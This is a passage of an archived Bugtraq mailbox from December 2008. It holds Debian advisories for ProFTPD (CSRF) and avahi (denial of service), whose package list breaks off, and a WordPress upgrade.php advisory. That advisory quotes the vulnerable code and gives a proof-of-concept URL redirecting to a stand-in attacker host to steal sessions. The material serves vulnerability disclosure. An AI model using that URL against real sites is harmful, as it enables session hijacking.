Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


11. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


12. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAklPzrQACgkQyNibggitWa2ElACfWJ2ZtjYITJ/719IkhmXcgCW1
jGAAoKsijwqusZFBFsrKyIEtJxirZwJw
=xCoI
-----END PGP SIGNATURE-----

From - Mon Dec 22 15:19:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005400
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38989-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 216C1ED200
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:12:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id B6154143798; Mon, 22 Dec 2008 09:52:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 32295 invoked from network); 21 Dec 2008 14:08:06 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <joey@infodrom.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
From: joey@infodrom.org (Martin Schulze)
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
User-Agent: dsa-launch $Revision: 1.18 $
Message-Id: <20081221142442.082362B3E1B@finlandia.home.infodrom.org>
Date: Sun, 21 Dec 2008 15:24:42 +0100 (CET)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-7.08 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5, PHONENUMBER=1.5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1689-1] New proftpd-dfsg packages fix Cross-Site Request Forgery
Priority: urgent
Resent-Message-ID: <rBaODizxsGM.A.5_H.TJlTJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun, 21 Dec 2008 14:27:31 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1689-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
December 21st, 2008                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : proftpd-dfsg
Vulnerability  : missing input validation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-4242
Debian Bug     : 502674
BugTraq ID     : 31289

Maksymilian Arciemowicz of securityreason.com reported that ProFTPD is
vulnerable to cross-site request forgery (CSRF) attacks and executes
arbitrary FTP commands via a long ftp:// URI that leverages an
existing session from the FTP client implementation in a web browser.

For the stable distribution (etch) this problem has been fixed in
version 1.3.0-19etch2 and in version 1.3.1-15~bpo40+1 for backports.

For the testing (lenny) and unstable (sid) distributions this problem
has been fixed in version 1.3.1-15.

We recommend that you upgrade your proftpd-dfsg package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.0-19etch2.dsc
      Size/MD5 checksum:      944 609e4ce00fbd5064cbf939ce8f867782
    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.0-19etch2.diff.gz
      Size/MD5 checksum:   180899 b0b18721ebf58fb77026c0bf4f3d9be2
    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.0.orig.tar.gz
      Size/MD5 checksum:  1751265 b857aaf750244106d1991bcb3c48f4a0

  Architecture independent components:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-doc_1.3.0-19etch2_all.deb
      Size/MD5 checksum:   493380 0267b116876ee92f620641d58d993841
    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-ldap_1.3.0-19etch2_all.deb
      Size/MD5 checksum:   162716 8fd092997183b78a7088fd1532f89849
    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mysql_1.3.0-19etch2_all.deb
      Size/MD5 checksum:   162722 7bb678b16043c24020f76783d38e15e6
    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-pgsql_1.3.0-19etch2_all.deb
      Size/MD5 checksum:   162722 c649d5a0b0f32137849c2afa5cb132ed

  Alpha architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_alpha.deb
      Size/MD5 checksum:   997344 c69dfa653681879af1857f90897079fe

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_amd64.deb
      Size/MD5 checksum:   854758 5d51e69ebbda89a96ccb3fcda3513803

  ARM architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_arm.deb
      Size/MD5 checksum:   794910 5c0d8a2c1aa18b40348d3d7b5a7e0408

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_hppa.deb
      Size/MD5 checksum:   933032 949a306ac2046a27bff7f3797f9bfff5

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_i386.deb
      Size/MD5 checksum:   798104 4fe16756d76c8cdb2b3c41f8ad92fd4f

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_ia64.deb
      Size/MD5 checksum:  1188066 9291c65580b50a7c478829e3307e11b7

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_mips.deb
      Size/MD5 checksum:   870756 06570fae0e9a8ba786b56464512f5451

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_mipsel.deb
      Size/MD5 checksum:   855034 e7ae30d19a1806c69dc0d6afad5c59ef

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_powerpc.deb
      Size/MD5 checksum:   885996 a5a81e9d5b86dda6462a7024f69aeac8

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_s390.deb
      Size/MD5 checksum:   853294 460507c587a7165dfd00d5776af70c60

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch2_sparc.deb
      Size/MD5 checksum:   827522 091f572d3565aae465046f11eccce143


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJTlGVW5ql+IAeqTIRAjKvAKCJ1LslA52c7VPJPs3+58NvSZzTfgCfVica
RHJMZjpj1nwjhN9jC5LVPLU=oOwM
-----END PGP SIGNATURE-----

From - Mon Dec 22 15:29:33 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005401
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39005-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id A726FED1FE
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:23:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2C9F6236F81; Mon, 22 Dec 2008 12:50:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6541 invoked from network); 22 Dec 2008 17:13:12 -0000
Message-ID: <494FD00E.1020505@isecauditors.com>
Date: Mon, 22 Dec 2008 18:36:14 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] Wordpress is vulnerable to an
 unauthorized upgrade and XSS
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

============================================INTERNET SECURITY AUDITORS ALERT 2008-001
- Original release date: January 3rd, 2008
- Last revised:  December 22nd, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 2/5
============================================
I. VULNERABILITY
-------------------------
Wordpress is vulnerable to an unauthorized upgrade and XSS

II. BACKGROUND
-------------------------
WordPress started in 2003 with a single bit of code to enhance the
typography of everyday writing and with fewer users than you can count
on your fingers and toes. Since then it has grown to be the largest
self-hosted blogging tool in the world, used on hundreds of thousands
of sites and seen by tens of millions of people every day. With a very
active development and evolution.

III. DESCRIPTION
-------------------------
If the WordPress is not the last version, anybody can upgrades the
aplication using wp-admin/upgrade.php

The snippet of vulnerable code:

if (isset($_GET['step']))
        $step = (int) $_GET['step'];
...
switch($step) :
    case 0:
        $goback = clean_url(stripslashes(wp_get_referer()));
...
    case 1:
        wp_upgrade();
        if ( empty( $_GET['backto'] ) )
           $backto = __get_option('home') . '/';
...

If step is set to one, the link "Have fun" is set to the backto
parameter value, then is possible to make a Cross Site Attack to steal
user sessions.

IV. PROOF OF CONCEPT
-------------------------
http://www.victim.com/wp-admin/upgrade.php
http://www.victim.com/wp-admin/upgrade.php?step=1&backto=http://www.The-attacker.org

V. BUSINESS IMPACT
-------------------------
If the upgrade fails, the availibility of the wordpress could be
affected. If the cross site attack succeeds, the confidentiality and
integrity of the content will be afected.

VI. SYSTEMS AFFECTED
-------------------------
All versions of wordpress are affected.

VII. SOLUTION
-------------------------
Wordpress considered was not as serious as it seams. So no patch
published for this issue.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December 21, 2007: Initial release
January   7, 2008: More details added.

XI. DISCLOSURE TIMELINE
-------------------------
December 21, 2007: Vulnerability acquired by
                   Internet Security Auditors (www.isecauditors.com)
January   6, 2008: WordPress security contacted.
January  11, 2008: WordPress security confirms they consider the
                   vulnerability as low impact.
December 22, 2008: Published

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.

From - Mon Dec 22 15:29:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005403
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38991-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id E6095ED1FE
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:27:07 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1435114386F; Mon, 22 Dec 2008 09:52:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24075 invoked from network); 22 Dec 2008 06:33:51 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <to�bian-security-announce@lists.debian.org>, rate: -6.1
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 22 Dec 2008 07:49:55 +0100
Message-ID: <874p0wwvos.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-7.58 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_1=1,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1690-1] New avahi packages fix denial of service
Priority: urgent
Resent-Message-ID: <M2_E9H_PbeK.A._PC.glzTJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 22 Dec 2008 06:53:20 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1690-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
December 22, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : avahi
Vulnerability  : assert errors
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3372 CVE-2008-5081
Debian Bug     : 508700

Two denial of service conditions were discovered in avahi, a Multicast
DNS implementation.

Huge Dias discovered that the avahi daemon aborts with an assert error
if it encounters a UDP packet with source port 0 (CVE-2008-5081).

It was discovered that the avahi daemon aborts with an assert error if
it receives an empty TXT record over D-Bus (CVE-2007-3372).

For the stable distribution (etch), these problems have been fixed in
version 0.6.16-3etch2.

For the unstable distribution (sid), these problems have been fixed in
version 0.6.23-3.

We recommend that you upgrade your avahi packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/a/avahi/avahi_0.6.16-3etch2.dsc
    Size/MD5 checksum:     1570 8ebff455c9264d5dbee95ab9577378e5
  http://security.debian.org/pool/updates/main/a/avahi/avahi_0.6.16.orig.tar.gz
    Size/MD5 checksum:   891970 3cbc460bbd55bae35f7b57443c063640
  http://security.debian.org/pool/updates/main/a/avahi/avahi_0.6.16-3etch2.diff.gz
    Size/MD5 checksum:    19735 a44b3f5fec53e6316da43c6a3b442e8c

Architecture independent packages:

  http://security.debian.org/pool/updates/main/a/avahi/avahi-discover_0.6.16-3etch2_all.deb
    Size/MD5 checksum:    25370 340795bc9ca2e64e801fddaac6d7a8bf
  http://security.debian.org/pool/updates/main/a/avahi/python-avahi_0.6.16-3etch2_all.deb
    Size/MD5 checksum:    25652 d6cf860ba2a5f8a098976473782c2a83

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:   106662 3fbdf722dfb11e2c4a1b17cefb7ea6b8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    40364 f4b2ea3da302452e2a9cbd4379daa26c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    23236 b05daf8a7a7b981dac5be1dd7e252913
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    27876 2056bc73e28aef4de30a9fa6f3bd6281
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    26886 1163c86061b5a4eec1eec373d35992ea
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    69410 bd94273184beb53cafb16fabfe8df360
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    59406 2590be33f54a8cb30734813b32187b60
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    32158 adbfd269dbc193711191cfc263732116
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    24982 6ef2e7c31116934bd7799239ea834662
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    39680 68b046de883b7e4a6b3251b9b0806a54
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:   190518 e82fd413940e3c5b4df71504295912d3
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    80352 cb5ab982034883bd47faa500fc7f8aa6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    25702 019fbb7d0668482101bcbdb54e3a49b7
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    29382 785a026351cc4ed289d6abb939eaafaa
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    45044 aca2b939624cbf22b2562fae405a6996
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    64010 d0cf4e59a93ccc42d7ed4f3877e4dc14
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    34164 ecc7e8f47701a32382703785fe5f9491
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    27868 04564fbd11c4150d2e1b6cb0fbc22cea
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    65540 ec965810133a4ab5546702af49d3f678
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    44190 fd1f6ea45614a3d5922507c66d9b8898
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    41910 3232185589d641841f471581bc7efbb7

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    25402 513e95ad6c2fb87c8316de0f21a958c0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:   145820 b234cdf7647e3d8d6bd919876a729aed
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    40014 893b50c144cd39194393b8b2b48e6af5
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    40732 3ca1605985570ae1c5e60fbda1da2a5b
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    78998 8ac6bf69b330ae356c93d11040b1ce92
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    45972 f65a50acee002fef7de31413a55188d3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    27602 cc94bd6ef246c0907e8239ecc63aced8
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    44184 3352ec376add650e83b1445f076225dd
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    34556 86dfbb1540112c5d7f76f44e228b4f4e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    58170 99c0ba315980248ac30cc3741f543a47
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    31888 6097f6fd4229243cb5456bd8eec2b8b2
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:   109494 6bbe277f75b34f90299b9371369b6d4d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    53320 30431adf1d426ac45a259997cba31d3d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    25670 5e76611ac629222a1b296c6d31164055
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    53668 d1472f40bb294e10b9d60d49ce2cfe5b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    39456 6f58090398ccee7ae34a425698a7e564
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    53434 c6e51db5ed2491e6b5712f9d5ab859f0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    26584 366cca7021dc0f3a11096f56b10d1917
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    22952 a32b47c3d7246b6b4684570aeef8073a
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    25202 e1bbd694e3337905a27df1b5002247b0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    27528 a9675e1d025162d1f084274c76ecf15a

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    22912 15f25a3fa47daead5ac5e6726798f868
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    30470 e884ed20cd4e9372ab8bf7f058312a3d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    27256 e784b9c093a6d1b4738e9e640e1a4183
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:   112406 ee560a6ecbdadd461097468dae9c9faf
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    46122 346a99034145ba0d2fa841dd8f5be168
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    40786 461cee0bd4f3d0e987c308daa70b0486
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    26124 574f1a1c1a28431e5f087cc4f586910c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    56718 f73efff9470440cfeb85fd1526f6d314
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    56198 0911a3c7851f103cf496e05e2d28dbf4
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    43422 6c007186fef8b3ef65d2aeb1905fce80
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    43900 8ee1473948cb706b8ae20747db126037
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    32070 274489d75dcf98d81ee3b728951c5150
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    26874 53cecb7746a23d8469abd841a6022b5a
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    34578 bcb55e3c180fa8d34955578e8c35a733
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    61094 a20a57641eabb686ca3df5b83a8385f6
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    43592 b1e4af50f06c1369414713f90c4cbb5b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:   159974 ec67b38e546b51d8d3282e3aac5690c8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    27958 275562493b65aed9efb3a8e9a5bacd46
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    54152 57746ebeca191c973941d9f22309261d
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    79584 ae8341ab2f4a6232f7a9e4e31f2628e0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    28448 8279827bbe596cc31c8c92f855e4077a

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    40232 0ab3fa7fc73fb609cdbec2d1d2ab514f
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    43358 f0a50ff65acb8ada30105bf9d5be6d43
